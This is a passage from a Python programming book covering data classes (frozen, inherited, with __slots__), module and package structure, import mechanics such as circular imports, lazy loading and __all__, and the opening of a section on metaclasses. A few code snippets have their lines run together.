Similar to the namedtuples which are immutable in nature, the Data classes can also be made read-only, so that the changes to its field are not allowed. This can be achieved with the help of the frozen=True parameter in the decorator while creating the class. Let us see how we can get an immutable version of the Car class that we have created:

from dataclasses import dataclass

@dataclass(frozen=True)
class Car:
    make: str = 'Honda'
    model: str = 'City'
    year_of_mfg: int = 2010

Fields in a frozen data class cannot be altered once they are created:

>>> car = Car('Honda', 'City', 2010)
>>> car.model
'City'
>>> car.model = 'Civic'
dataclasses.FrozenInstanceError: cannot assign to field 'model'

Note that if the field in the data class contains mutable members, then they can still be modified. This is applicable to any immutable data structure in Python that is nested.

To keep such issues away, ensure that if you are making your data class immutable, then all the constituent subtypes should also contain immutable constructs.
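To illustrate the caveat, a frozen data class holding a list still allows that list to be mutated; only rebinding the field itself is blocked (the Garage class here is hypothetical):

from dataclasses import dataclass, field

@dataclass(frozen=True)
class Garage:
    cars: list = field(default_factory=list)

g = Garage(cars=['City'])
g.cars.append('Civic')      # allowed: the list object itself is still mutable
print(g.cars)               # ['City', 'Civic']
# g.cars = []               # would raise dataclasses.FrozenInstanceError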

Inheritance

Like regular classes, Data classes also follow the inheritance chain. You can simply derive from the Data classes to create subclasses. Let us see that in action with the following example:

from dataclasses import dataclass

@dataclass
class Car:
    make: str
    model: str

@dataclass
class CarForSale(Car):
    year_of_mfg: int
    state_of_reg: str
    miles: int

You can now use this example in a very easy manner:

>>> CarForSale('Honda', 'City', 2010, 'Bengaluru', 50000)
CarForSale(make='Honda', model='City', year_of_mfg=2010, state_of_reg='Bengaluru', miles=50000)

Let us see what happens when the data class fields have been assigned default values:

@dataclass class Car: make: str = "Honda" model: str = "Civic"

@dataclass class CarForSale(Car): state_of_reg: str #This will fail!

The preceding code will throw a TyprError exception. This is because the default valued arguments are treated like named arguments. The error will specify that the non-default arguments are coming after the default ones, which is corollary to positional and named arguments’ placement. The __init__ method of the dataclass will be signature as follows: def __init__(make:str='Honda', model:str='City', state_of_reg:str):

This is not the Pythonic syntax for parameterization. Python mandates that when you have a named parameter, all the parameters following that should also have the assigned default values. Similarly, if a parent class field has a default value assigned, all the parameters inserted in the derived classes should also be given default values. In addition, the order of the fields also matters in derived classes. If you are overriding the fields from the parent, the same order must be followed. Let us take the following example to see that:

@dataclass
class Car:
    make: str
    model: str
    miles: float = 0.0
    price: float = 0.0

@dataclass
class Sedan(Car):
    model: str = 'Civic'
    price: float = 40000.0

>>> Sedan('Honda')
Sedan(make='Honda', model='Civic', miles=0.0, price=40000.0)

The order in which the fields are defined in Car must be maintained in the derived Sedan class, and the default values, when reset in the derived class, are overridden.

How to optimize data classes?

Remember the concept of __slots__ that we discussed earlier in the chapter? They can prove to be a powerful tool to optimize the use of the data classes. Treating them as regular classes, you can use the slots in the same way:

@dataclass
class Car:
    make: str
    model: str
    price: float

@dataclass
class CarWithSlots:
    __slots__ = ['make', 'model', 'price']

    make: str
    model: str
    price: float

Note that, if a variable is not part of __slots__, then it cannot be defined. Also, you cannot provide default values for the members of a class that have __slots__.

These can be used for obtaining optimizations in the data classes. It is seen that classes that use __slots__ have a lower memory footprint. Let us take the following example to measure it:

>>> from pympler import asizeof
>>> without_slots = Car('Honda', 'Civic', 40000.0)
>>> with_slots = CarWithSlots('Honda', 'Civic', 40000.0)
>>> asizeof.asizesof(without_slots, with_slots)
(456, 80)

The use of __slots__ also helps to optimize the runtime of the program. Take an example that clocks the time it takes to access the attributes on the data class and compare it with a non-slot class:

>>> import timeit
>>> timeit.timeit('car.make', setup="car = CarWithSlots('Honda', 'City', 4000)", globals=globals())
0.058987637236736498

>>> timeit.timeit('car.make', setup="car = Car('Honda', 'City', 4000)", globals=globals())
0.092176423746747695

The use of __slots__ in the data class gives a performance boost of more than 30%, as compared to the case when the data class does not have __slots__ defined.

Do note that Data Classes feature is only available from Python 3.7 onwards.

Conclusion

Even though Python is not a language that demands strict object oriented programming, it still ensures that you get the right set of tools if you need. Classes, objects, attributes, and properties are the key features that enable and empower the object-oriented design patterns in Python.

In this chapter, we looked into some of the lesser-known features and utility examples of the various constructs. Classes can be structured keeping in mind the appropriate constitution, access-controlled methods, and their ordering. We also covered optimal ways of dealing with the properties and attributes of classes. The efficient use of magic methods at the class level to achieve performance and scalability of code was also discussed. Finally, we understood the fundamentals and nuances of the Data Classes construct in Python 3, which provides a powerful struct-like data structure that can be optimized for memory usage and performance.

In the next chapter, we will be looking into how we can make the best use of Modules, and how would the metaclasses and metaprogramming help in developing the extensible and reusable code.

Key takeaways

It is time to create a different class, if the current class does more than one thing.

The @property decorator, when used to wrap around a function, transforms it into a getter.

You can house the utility functions in a library, or in a class as a static function, if the function is falling under the objective of the class.

The == operator checks for equality. The is operator checks for identities. The is operator evaluates to True if both the operands are references to the same or identical object. The == operator evaluates the expression to True if the operands are of the same type and have the same contents, that is, they visually look the same.

MRO follows the order – the current class, its parent classes, and the parent classes of those parents and so on, until we reach the object class, which is the root class of all classes in Python. Sequence generation in Python warrants the implementation of the __getitem__ and __len__ methods. A sequence also expects the elements to start at index zero and the iterable should return the elements it contains, individually in that order.

Python objects which implements the __contains__ magic method, returning a Truth-value, is referred to as a container.

The __str__ method displays the class in human readable manner. Similarly, the __repr__ method is used to get a machine-readable format for the class.

It is usually not considered Pythonic to use generic except statements for exception handling; they are considered an antipattern. Write a base class for your exceptions, and derive specific exceptions from it for scalable code. By default, Python performs a shallow copy. Use the copy module to explicitly specify the copy behaviour. Abstract Base Classes enforce method implementation from the parent or base class. Use the abc module to raise errors on missing implementations.

Class variables can be leveraged when you want to share the information between all instances of the class. Instance variables have a higher priority than the class variables, having the same name within the scope. Unlike Java, Python treats the module as the unit of encapsulation, and not actually classes.

Data classes have some pre-configured functionality to create instances of the class, print the contents of the class, and compare between the different data class instances.

Data classes mandate the use of Type Hints when you define the fields in the class. If you do not supply the types, the field is ignored. However, if the type is not known in advance, Python provides the typing.Any generic type.

Ensure that if you are making your data class immutable, then all the constituent subtypes should also be immutable constructs. In Python 3.7+, the use of __slots__ in the data class gives a performance boost of more than 30%, compared to a case when the data class does not have the property defined.

Further reading

Dusty Phillips, Python 3 Object-Oriented Programming, 2nd Edition.

Joshua Dawes, A Python object-oriented framework for the CMS alignment and calibration

Mark Pilgrim, Serializing Python

CHAPTER 4 Python Modules and Metaprogramming

“Everything you can imagine is real.”

— Pablo Picasso

Python metaprogramming is very useful in the design and implementation of elegant and complex design patterns. Many popular Python libraries, including SQLAlchemy and Django, make use of metaclasses to enhance code reusability and extensibility.

In this chapter, we will be discussing the intricacies of modules and metaclasses, which are critical Python features. When working with large projects, they make it possible to write cleaner code. Metaclasses are considered a hidden feature in Python, which can be used to organize and restructure your code.

Structure

We will be broadly covering the following topics:

Understanding modules and packaging code in Python.

Learning effective handling of imports.

Understanding metaclasses and their use in changing class behaviour.

Objectives

Structuring code effectively is as useful as writing good code. This chapter aims to introduce you to concepts, which give insights into how you can enhance existing Python code, and what to keep in mind while designing a Python project from scratch. At the end of this chapter, you will be able to achieve the following:

Organise your project’s code better into encapsulated modules.

Make proper use of imports to improve performance of your code and avoid introducing bugs and latency with imports.

Understand how to influence the behaviour of the classes in runtime, as well as hide the intricate operations of the class from external users.

Modules and packages

Modules in Python can be defined in three different ways:

Indigenous modules written natively in Python itself.

Modules originally created in C but are dynamically loaded at runtime, an example being the re (regular expression) module. Then, there are built-in modules, which are part of the Python interpreter itself, an example being the itertools module.

All of the preceding modules are used in programs with the import statement. Python modules are the simplest to create. Simply put your logic into code within a file having a name and a .py extension, and you are done. In the scope of this chapter, we will be discussing the intricacies of modules written in Python.

When an import statement is executed using the Python interpreter, the .py file is searched for in the directories in the following order:

The current directory from which the interpreter was invoked or the initial file is run from.

Next, it looks for the file in all the paths registered with the PYTHONPATH environment variable. (Syntactically similar to the PATH variable, and is system dependent.)

The installation-dependent default paths that were registered when Python was installed on the system (typically the standard library and site-packages directories).

Therefore, when you create a module, and want it to be available in sessions and script runs, one of the following steps need to be configured:

Put your .py file in the directory from which the script is invoked.

Check your PYTHONPATH and put the script in one of its directories.

Check the Python installation's default search directories (such as site-packages) and put your script in one of them.

The final alternative is to simply let the script be where it is and add its path to sys.path during the run-time of the program. For example, if the script is in C:\scripts\cage:

>>> sys.path.append(r'C:\scripts\cage')
>>> sys.path
['c:\\python3\\lib', 'c:\\python3', 'c:\\python3\\lib\\site-packages',
 'c:\\python3\\lib\\site-packages\\win32', 'c:\\python3\\lib\\site-packages\\win32\\lib',
 'c:\\python3\\lib\\site-packages\\Pythonwin', 'c:\\scripts\\cage']

If you want to check the location from which a module has been imported, you can do that with the __file__ attribute that is configured for the module. For example:

In [18]: import matplotlib

In [19]: matplotlib.__file__
Out[19]: 'c:\\python3\\lib\\site-packages\\matplotlib\\__init__.py'

Packages are a way to control the hierarchy of the module namespace. The “.” notation is used for this purpose.

Just like global variable name conflicts are avoided with the help of modules, packages help to achieve the same distinction for modules with similar names. In addition, they provide the much-needed structure for your code.

Using __init__.py files for package interface creation.

In day-to-day use cases, all you would need to do is create a blank __init__.py in the directory to classify it as a package. However, there is quite a bit of useful information that can be configured in the __init__.py file, controlling the initialization and accessibility of the package. Consider a situation where your package has a score of modules, but you only want a few of them to be available for end use when imported; in that case, you can configure them using the __init__ file. You can abstract sections of the module hierarchy by importing sub-modules and sub-sub-modules in the __init__ file, and the end user will perceive them as declared in the main module itself. It is a more common practice than you think, as it helps simplify interfaces – the Flask module being an example.

You can import modules from all over your package and make them available via the init module. This lets the client code refer to classes that may be nested even four levels deep, as if they were declared in the main module. This is very commonly done in libraries and frameworks, like Flask, which aim to create simple interfaces for the client code. Let us see this with the help of the following example of a delta package:

The regular

# delta main package initialized with empty # __init__.py. You import packages at their normal # hierarchical structure.

from delta.api.interface import Delta
from delta.api.lib.utils import DeltaUtils

The Pythonic

# __init__.py
from delta.api.interface import Delta
from delta.api.lib.utils import DeltaUtils

# In client side scripts
from delta import Delta, DeltaUtils

You can use the __init__.py file to control what modules are visible to the external world.

Creating executable packages using __main__.py

The packages can have both library as well as executable code. Often, a Python program is run by naming a .py file on the command line:

$ python programName.py

You can define a __main__ invocation point for the application, which provides a context for execution and will be invoked when the script is run directly as an executable. Remember that the special value of the string __main__ for the __name__ variable indicates that the Python interpreter will be executing your script and not importing it.

if __name__ == "__main__": do_something() print_something()

This sorts things out for a standalone script. Now, how do we achieve this on a package level? The solution is to define the __main__.py file. When you run the package using the -m module flag, the __main__ script is invoked, or the directory or a zipped version of the directory is passed to the interpreter as an argument.

You can also zip the folder and pass the zip file as an argument. Yes, Python can zip the files and folders for you:

python -m zipfile -c projectname.zip projectfolder

You can now get rid of the directory and directly run the following:

python projectname.zip

You could now easily obfuscate the zipped program and run it directly from the shell like a binary without exposing your code:

echo '#!/usr/bin/env python' >> programName
cat projectname.zip >> programName
chmod +x programName

Finally, you can get rid of all the files and folders and simply run the program like the following:

./programName

This is considered a much better approach than the hacky way of using the if __name__ == "__main__" construct.

Note that a __main__ module does not necessarily come from a __main__.py file. When a script is executed, it will run as the __main__ module, rather than the programName module. This also happens for modules that are run as python -m moduleName. If you saw the name __main__ in an error message, it does not necessarily mean that you should be searching around for a __main__.py file.

Encapsulate with modules!

Python indeed supports object-oriented programming, but it does not mandate it. Over the years, classes and polymorphism have been used sparingly in Python. In languages like Java, classes are the basic units of encapsulation. Each file in Java is mandated to be written as a class, whether or not it requires one. This can sometimes make code unintuitive and difficult to logically interpret. In Python, however, modules are used to group related data and functions, thereby encapsulating them. Consider an example of an MVC framework based application built in Python. I would have a package with the application name containing the model, view, and controller modules separately. This application can have a very large codebase, thereby containing several modules within numerous packages. The controller package can have separate modules for processing and storage; however, neither of those need to be related, except for the fact that, interactively, they can be clubbed under controller.

If we translate all of these modules into classes, the issue would be interoperability. The precise determination of the methods to be exposed to the outside world, and how the updating of state takes place, needs to be carefully decided. Also, note that the described MVC application does not necessitate the use of classes – simple import statements suffice, and they make the encapsulation and sharing of the code more robust. Loose coupling is achieved when the state is explicitly passed as arguments to the function. Object-oriented programming using classes may be a handy paradigm, but Python does not restrict you to stick to that paradigm always.
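As a tiny, hypothetical illustration of that loose coupling, the state is passed explicitly rather than hidden inside an object:

# Loose coupling: the cart state is passed in explicitly, so the function
# has no hidden dependencies and can live in any module.
def apply_discount(prices, discount_rate):
    return [price * (1 - discount_rate) for price in prices]

total = sum(apply_discount([100.0, 250.0], 0.10))  # 315.0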

Using modules for organised code

Modules in Python are a way to abstract the layers of your project for better organisation. Modules help to aggregate and group classes, variables, and methods that are related. This section will deal with some of the widely adopted constructs to use modules better.

Consider a scenario where you want to setup your own online marketplace. To achieve it, you would want to have different layers for different functionality. It is possible that each such layer would only have a few functions, which can be part of a single file or different files. When you want to use the functionality from one layer in another, all you have to do is use the import statement from another module.

Let us look at some of the following rules that can help to create better modules:

Short module names are preferred. You can also consider not using underscores, or keeping them to a minimum.

The regular

import user_card_payment
import add_product_cart
from user import cards_payment

The Pythonic

import payment
import cart
from user.cards import payment

Names with dots (.), special characters, or upper case letters should be avoided. Therefore, a file name like credit.card.py should not be preferred. Having special characters like these in names can lead to confusion and hampers code readability. PEP 8 also discourages the use of special characters in names.

The regular

import user.card.payment
import USERS

The Pythonic

import user_payment
import users

Module readability also depends heavily on how the imports are constructed.

The regular

[…]
from user import *
[…]
cart = add_items(4)

The used function provides no clue as to where it is being imported from or which library it is part of, if there are multiple such imports.

The Pythonic

from user import add_items
[…]
all_items = add_items(4)

This clearly indicates that the user library is the one from which the method is imported. A more Pythonic way:

import user
[…]
all_items = user.add_items(4)

This approach makes it evident at every place of use which library the method comes from, rather than having to scroll up to see where you imported it.

The appropriate use of modules in Python code not just makes it clear and readable, but also helps to achieve the following project goals:

Scoping: A separate namespace is a characteristic of a module. This helps to prevent collisions between tokens and identifiers in different parts of the code.

Simplicity: Modules help to segregate larger problems into rather small, understandable segments. This makes it easier to write code, which leads to code that is more readable. It also helps to debug the code and makes it less error prone.

Maintainability: Modules help you to define the logical boundaries in your code. Modules help you to minimize dependencies by segregating interdependent code into a module. This is helpful for large projects, so that more than one developer can contribute without stepping on each other’s toes.

Reusability: Functionality defined in a single module can be easily reused (through an appropriately defined interface) by other parts of the application. So now, you do not need to duplicate your code.

Type hinting and circular imports

Circular imports can be an unavoidable occurrence for large, growing codebases which are not structured well. This is usually the case for applications with rapid deploy cycles. Some module alpha imports another module beta, which in turn imports alpha – that is a circular import. Python does not have syntactic problems with cycles in the dependency chain, and the consequences will depend upon how both the modules interact. That being said, when circular imports cause a problem, it usually leaves you scratching your head to figure it out. When we start including Type Hinting in our Python code, the probability of encountering a circular import increases. This stems from the fact that type hints in the class increase the use of imports. In addition, these imports need to be top-level imports, in order to prevent messing with the deferred or locally scoped imports.

For the usual circular imports, most modern linters will issue a warning that can be manually handled. However, for cases that involve issues due to type hinting, the solution discussed in the following section should be effective. Let us say we have two modules – alpha.py and beta.py – that are dependent. alpha.py creates an interface for a REST end point, and instantiates an object of Beta:

# Script: alpha.py
from beta import Beta

class CreateAlpha:
    def get_beta(self) -> Beta:
        return Beta(alpha=self)

The Beta class is defined to hold a reference to the connection:

# Script: beta.py
from alpha import CreateAlpha

class Beta:
    def __init__(self, alpha: CreateAlpha):
        self._conn = alpha

It is evident that the preceding scenario will result in the interpreter generating a stack trace for circular imports:

file "main.py"
    from alpha import CreateAlpha
file "alpha.py"
    from beta import Beta
file "beta.py"
    from alpha import CreateAlpha
ImportError: cannot import name 'CreateAlpha' from 'alpha'

In the beta.py script, only the CreateAlpha type hint being used requires the import of the alpha module. The naïve approach to

resolving this would be to simply drop the type hint. The smarter approach would be to use Conditional Imports defined in the following section.

Using conditional imports with type hints

A not very well known approach for such instances is conditionally importing the required modules only when the execution occurs in the type hinting mode. We can use the constant TYPE_CHECKING which is part of the typing module to effectively implement this.

# Script: beta.py
from typing import TYPE_CHECKING

# Check whether type checking is enabled
if TYPE_CHECKING:
    from alpha import CreateAlpha

class Beta:
    def __init__(self, alpha: 'CreateAlpha'):
        self._conn = alpha

This will now resolve the circular import issue even when type hints are enabled.

As per PEP-563 (Postponed evaluation of Annotations), with the advent of Python 3.7, you can explicitly supply the type hints sans the quotes. However, for that to work, you will need to import the annotations as `from __future__ import annotations`.
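A minimal sketch of the same beta.py using postponed evaluation of annotations, so that the quotes around the type hint are no longer needed:

# Script: beta.py (Python 3.7+)
from __future__ import annotations   # must come before any other import
from typing import TYPE_CHECKING

if TYPE_CHECKING:
    from alpha import CreateAlpha

class Beta:
    def __init__(self, alpha: CreateAlpha):   # no quotes needed now
        self._conn = alpha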

Singleton nature of imports in Python

When a Python script loads a module in the course of execution, the code is executed and initialized only once. If some other part of the code tries to import the same module, the initialization does not take place again. You can say that the module level variables are singleton in nature, that is, single initialization only. On the positive side, this behaviour can be taken advantage of during the object initialization. Even before the term Singleton Pattern was coined for the system design, Python was already using Singleton as a concept. In Python, the modules being singleton means that only one copy of it is loaded into memory at the first import. Any subsequent import simply returns the same loaded object. A small snippet to see this concept in action is as follows:

from __future__ import annotations  # __future__ imports must appear before any other imports

from typing import Optional

class HelperMetaClass(type):
    """We can implement Singleton classes in Python in multiple
    ways, including decorators, metaclasses and base parent
    classes among others. Let's use a metaclass for this example.
    """
    _object: Optional[MySingletonClass] = None

    def __call__(self) -> MySingletonClass:
        if self._object is None:
            self._object = super().__call__()
        return self._object

class MySingletonClass(metaclass=HelperMetaClass):
    def do_something(self):
        """The executable business logic for this instance"""
        # …

if __name__ == "__main__":
    # End User Code.
    s1 = MySingletonClass()
    s2 = MySingletonClass()

    if id(s1) == id(s2):
        print("Correct Singleton, same instance for both variables")
    else:
        print("Wrong Singleton, different instances for variables")

Can you figure out what the result of the preceding code would be?
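Separately, the singleton behaviour of imports themselves can be observed directly in the interpreter with any standard module; the following is purely illustrative:

import math
import math as math_again
import sys

# Both names refer to the single module object cached in sys.modules
print(math is math_again)              # True
print(sys.modules['math'] is math)     # True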

Lazy imports for Python modules

Sometimes, the huge stack of import statements on the top of your script can not only be scary but also lead to increased memory usage and load times for heavy applications. It is possible to take advantage of Python’s open constructs to achieve a lazy loading mechanism, which will only load the module on demand. One such class is present in the TensorFlow library, which they use to load the contrib module. Since the code does not have any dependencies, I will simply copy it here and then discuss how it works.

# Source https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/util/lazy_loader.py

"""A LazyLoader class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import importlib
import types

class LazyLoader(types.ModuleType):
    """Lazily import a module, mainly to avoid pulling in large
    dependencies. `contrib`, and `ffmpeg` are examples of modules
    that are large and not always needed, and this allows them to
    only be loaded when they are used.
    """

    def __init__(self, local_name, parent_module_globals, name):
        self._local_name = local_name
        self._parent_module_globals = parent_module_globals

        super(LazyLoader, self).__init__(name)

    def _load(self):
        # Import target module and insert
        # in the parent's namespace
        module = importlib.import_module(self.__name__)
        self._parent_module_globals[self._local_name] = module
        self.__dict__.update(module.__dict__)
        return module

    def __getattr__(self, item):
        module = self._load()
        return getattr(module, item)

    def __dir__(self):
        module = self._load()
        return dir(module)

Source: TensorFlow Lazy Loader - Github Repository

This mechanism of lazy loading modules works by initializing a dummy module at the initialization stage, and when the lazy loader is invoked, the actual module is loaded and replaces the dummy module. The invocation looks something like the following:

contrib = LazyLoader('contrib', globals(), 'tensorflow.contrib')

This has the same effect as executing the following import at the beginning:

import tensorflow.contrib as contrib

In order to ensure that the globals are correctly updated with the lazily loaded module, we extend the ModuleType from the types library. In addition, you can access all of the attributes in the module by the implementation of the __getattr__ method.

Similarly, tab completion in an interactive IPython shell is enabled by the implementation of the __dir__ method.

Calling one of these methods triggers a load of the original module, which then updates the globals to reference the original module, and the state of the lazily loaded module is updated to that of the original module. This prevents reloading the module every time it is referenced thereafter.
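Note that the standard library also ships a comparable facility, importlib.util.LazyLoader, which defers execution of a module until one of its attributes is first accessed. A minimal sketch of the documented recipe, with a hypothetical helper name, looks like this:

import importlib.util
import sys

def lazy_import(name):
    """Return a module whose loading is deferred until first attribute access."""
    spec = importlib.util.find_spec(name)
    loader = importlib.util.LazyLoader(spec.loader)
    spec.loader = loader
    module = importlib.util.module_from_spec(spec)
    sys.modules[name] = module
    loader.exec_module(module)
    return module

# Nothing heavy runs until an attribute of the module is touched
json_mod = lazy_import("json")
print(json_mod.dumps({"lazy": True}))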

Features of Python module imports

In practical situations, importing modules seem trivial and they happen to be taken for granted. However, the more we dive into complex Python code, the more we feel the need to understand the intricacies of how imports and modules are handled internally by Python. Some examples of such use cases might be as follows:

Let us take an example of the mathematical operations library in the core Python library. Sometimes, you need a non-standard implementation of certain mathematical operations, and you might want to give them the same name for relevance and ease of use. In that case, if you import both the modules, which one takes precedence?

Relative versus absolute imports can also be tricky. We know what packages are – they are a collection of relevant and associated modules, while also being modules themselves.

In this section, we will take a look at some of the lesser known usages and tricks of the import statement.

Can modules use characters besides English?

Theoretically, module names can be composed of any language characters or even punctuation. The standard library and core Python modules all have English names, but Python is flexible with that. For ease of access and readability, you can use your mother tongue, or any other language, to name your modules when needed. Even though it is not a good idea for distributable code, Python still allows it.

$ echo "print('Hello')" > नमस्ते.py
$ python3 नमस्ते.py
Hello

In the preceding snippet, we created a module named नमस्ते.py that prints "Hello". In India, नमस्ते refers to Hello in the Hindi language. You can see that Python has no issues in identifying or executing the script, despite the non-English characters.

Python makes use of the Unicode character set, and therefore also allows you to use non-English characters for variable assignments. Isn’t that cool? Not just other languages, you can even use English punctuation in your module names.

>>> from string import punctuation as symbols
>>> print(symbols)
!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~

The above shows the symbols that Python identifies as punctuations. We have seen some of these characters used in Unix file names, but can they be used for naming Python modules? Let us look at the following example:

$ echo "print("Hello")" > saying-hello-to-you.py $ python3 saying-hello-to-you.py Hello

In the above example, the hyphen is used in the module name and we see that Python executes it as expected. However, we notice the first signs of problems when we try to import this in other scripts or interactive shells.

>>> # External Module
… import saying-hello-to-you
… def myFunction(myArg):
…     call_some_method()

    import saying-hello-to-you
                  ^
SyntaxError: invalid syntax

Now, what happened here? To understand this, we need to revisit the variable naming rules in Python. Among the punctuation characters, Python allows only the underscore in names, and no others. That is why importable scripts cannot use other special characters in their names.

This may not always be bad. Think about a use case where you want to create a script only for standalone execution, but want to restrict the explicit imports to that module. The punctuations can be a good hack.

However, is that foolproof? Definitely not. A workaround for importing modules that have punctuation or special characters as constituents is also provided by Python. There is a built-in method called __import__ which helps to load a module, similar to the imports at the top of the file.

>>> __import__('saying-hello-to-you')
Hello

The __import__ method takes the string representation of the module name and loads it. It is internally used as part of the import statement, and is more flexible as it can operate on any string-formatted module name. In fact, you can even use white space separated multi-word names for modules – look at the following example:

In [4]: !touch "hello world.py"

In [5]: __import__("hello world")
Out[5]: <module 'hello world' from 'hello world.py'>

In [6]: import hello world
  File "<ipython-input-6>", line 1
    import hello world
                     ^
SyntaxError: invalid syntax

The import statement is compliant with Python naming rules, while the __import__ statement is not. Both are still usable.
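For programmatic imports in application code, the Python documentation recommends importlib.import_module over calling __import__ directly; a small illustration:

import importlib

# Load a module by its string name at runtime
json_module = importlib.import_module("json")
print(json_module.dumps({"loaded": "dynamically"}))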

Do Python modules need the .py extension?

From the time we started learning Python, we are habituated to naming our modules with the .py extension. However, unlike Java or C++, the .py extension is not at all mandated by Python for its modules and scripts. Let’s run the following small test:

echo "print('I have the .py extension')" > withExtension.py echo "print('I ain't got an extension')" > noExtension python3 withExtension.py python3 noExtension

I have the .py extension I ain't got an extension

It is evident that the .py extension is insignificant for a script to be executed as a Python script. However, like always, there is a catch here – let us see what happens when we try to import this script:

import withExtension # Works

import noExtension
ModuleNotFoundError: No module named 'noExtension'

We see that despite the two scripts being present in the same folder, the one without the extension raises a ModuleNotFoundError. This is primarily because Python mandates the naming of modules and scripts with the .py extension, for ease of identification as Python modules.

Similar to what we discussed in the previous section, you can also use the .py extension hack to create a script only for standalone execution, but it would restrict the explicit imports into that module.

Therefore, the two salient features that we discussed about Python module naming are as follows:

Non-English characters can be used in module names, although they are not encouraged.

Python mandates the use of the .py extension for modules. If you skip that, you can execute the script, but NOT import it.

Can a module be available across the system?

Okay. You write a custom module, something cool, and you now want other people to use the module as well. One way is to distribute it, and make every one use that code. However, in organisations where code is the Intellectual Property, how do we ensure that custom modules that we write are available at a system level for all the users?

Let us take an example of a wrapper for computing the runtime of a method or codeblock and implement this with a decorator.

def get_runtime(method):
    import time
    def code_time_func(*args, **kwargs):
        start = time.time()
        func_call_result = method(*args, **kwargs)
        end = time.time()
        print("Execution time: ", method.__name__, " : ", end-start)
        return func_call_result
    return code_time_func

We will discuss decorators in more detail, further in the book. In short, a decorator function takes in a function as an argument and returns a wrapper function as a result. This can add

additional functionality to the original method. To use it in the same directory/module, we can use the following:

@get_runtime
def iterate_and_print(num):
    for index in range(0, num+1):
        print(index)

@get_runtime
def get_fibonacci(num):
    int1 = 0
    int2 = 1
    for _ in range(num):
        int1, int2 = int2, int1 + int2
    return int1

To make such a module available at a system level for all users, add the directory containing it to the PYTHONPATH in your shell profile, for example:

echo 'export PYTHONPATH=$PYTHONPATH:/path/to/your/modules' >> ~/.bashrc

What happens with modules having the same name?

You can theoretically install different modules having the same importable name, or you can have a library module and an overriding custom module with the same name. So, how does the interpreter decide which of these modules to pick up when the import statement is executed? The key to this is the system path (sys.path).

import sys
print(sys.path)

['/usr/local/bin', '/usr/local/Cellar/python/3.7.4_1/Frameworks/Python.framework/Versions/3.7/lib/python3.7', '/usr/local/Cellar/python/3.7.4_1/Frameworks/Python.framework/Versions/3.7/lib/python3.7/lib-dynload', '', '/Users/sonalraj/Library/Python/3.7/lib/python/site-packages', '/usr/local/lib/python3.7/site-packages', '/usr/local/lib/python3.7/site-packages/aptpython-0.1-py3.7.egg', '/usr/local/lib/python3.7/site-packages/IPython/extensions', '/Users/sonalraj/.ipython']

The Python interpreter will serially search the directories present in sys.path and look for the required module in that order. If a module is found, the search will exit, and the module will be imported. If the whole list has been searched and the required module is not found, then a ModuleNotFoundError is raised.

As discussed earlier in the chapter, the order in which Python prioritizes the module search is as follows:

The current working path.

All paths that are part of the PYTHONPATH variable.

The original install paths of the Python core libraries and third party packages.

One of the elements in the sys.path is ‘’, an empty string, which references the current path.

Now, coming back to what would happen if there were multiple modules with the same name in the installation, which of them would be imported? The answer to this one would be the one that is encountered first in the list. If the custom module path appears before the built-in module, then you have it all figured out.
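As a small, hypothetical illustration, you can place a directory of overriding modules ahead of everything else on sys.path at startup; the directory and module names below are assumptions:

import sys

# Hypothetical directory containing a custom module that shadows an installed one
sys.path.insert(0, '/opt/my_overrides')

import payments   # resolves to /opt/my_overrides/payments.py if it exists there
print(payments.__file__)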

Decide which imports to expose with __all__

By default, there is nothing private in Python. Therefore, everything that is defined in a module will be imported. In the interactive prompts or notebooks, the tab completion will also show you the constituents in the import.

Python does provide a mechanism to control the explicit import of content from a module. There is a module-level variable in Python called __all__ which allows the author to control what should be imported by default.

Let us take an example of a module creditCard.py. We can put all the specific components that we want to make importable in the __all__ construct.

# creditCard.py
class OutstandingAmount:
    ….

class CreditLimit:
    ….

class TotalSpends:
    ….

__all__ = ["OutstandingAmount", "TotalSpends"]

# client_code.py
from creditCard import *
total_spends = TotalSpends()   # Works Fine
credit_limit = CreditLimit()   # Raises an exception (not listed in __all__)

The preceding example does not import everything by default now. However, the classes that are not exposed via the __all__ construct can still be imported by explicitly specifying the class names, instead of a star.

from creditCard import CreditLimit # Works Fine!!

Python metaclasses

In short, metaclasses are constructs that are used to create classes. Just as classes, when instantiated, create object instances, metaclasses, when instantiated, create other classes and define their behaviour. There are several use cases that metaclasses prove to be very useful for, some of which are as follows:

Class registration at creation/run time.

Profiling code or logging.

Dynamic addition of new methods.

Synchronization or automated resource locking.

Creating properties automatically.

Setting up templates for the code.

Every programming language that supports the use of metaclasses has its own unique way of implementing them. In this section, we will look at some of the nuances of metaclasses in Python.

When are metaclasses needed

You will not come across a requirement of metaclasses every time you code. It comes in handy mostly when you are creating APIs for complex libraries and features. It is a useful abstraction tool for implementation details of your code, while exposing a simple and easy-to-use interface to the library/API.

A simple example of the use of metaclasses is in Django ORM. The ORM API thereby is simple and easy to understand. An excerpt would look like the following:

class Car(models.Model):
    make = models.CharField(max_length=45)
    year_of_mfg = models.IntegerField()

>>> car = Car(make="Honda", year_of_mfg=2010) >>> print(car.year_of_mfg)

Here, car.year_of_mfg will not be returning an instance of IntegerField as initialized; rather, an int value is returned. The Django ORM framework defines a metaclass for models.Model which is used to convert the Car class into a complex hook for the fields in the database. Using metaclasses under the hood lets Django convert something complex into a simple exposed API.

In Python 3, a newly created class can be instructed to use a metaclass by passing a predefined type as an argument. The metaclass hooks into class creation through special methods, sometimes referred to as magic methods. The common ones (in order of invocation) are as follows:

__prepare__: For attribute storage, the namespace mapping of the class is defined by this magic method.

__new__: This method is invoked when a class is created based on the metaclass provided.

__init__: This magic method initializes values post creation of the class object.

__call__: This magic method uses the constructor for creating an object of the new class.

These methods can be overridden by the user in the custom metaclass you are writing, in order to enforce a different behaviour compared to the default metaclass – type. These help to build beautiful APIs. The source code of some of the popular libraries in Python, including requests, flask, and so on, makes extensive use of metaclasses for generating simple end-user APIs.
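The following is a minimal, illustrative metaclass (the names TracingMeta and Example are hypothetical) that prints when each of these hooks fires:

class TracingMeta(type):
    @classmethod
    def __prepare__(mcls, name, bases, **kwargs):
        print("__prepare__: building the class namespace")
        return super().__prepare__(name, bases, **kwargs)

    def __new__(mcls, name, bases, namespace, **kwargs):
        print("__new__: creating the class object")
        return super().__new__(mcls, name, bases, namespace)

    def __init__(cls, name, bases, namespace, **kwargs):
        print("__init__: initializing the class object")
        super().__init__(name, bases, namespace)

    def __call__(cls, *args, **kwargs):
        print("__call__: creating an instance of the class")
        return super().__call__(*args, **kwargs)

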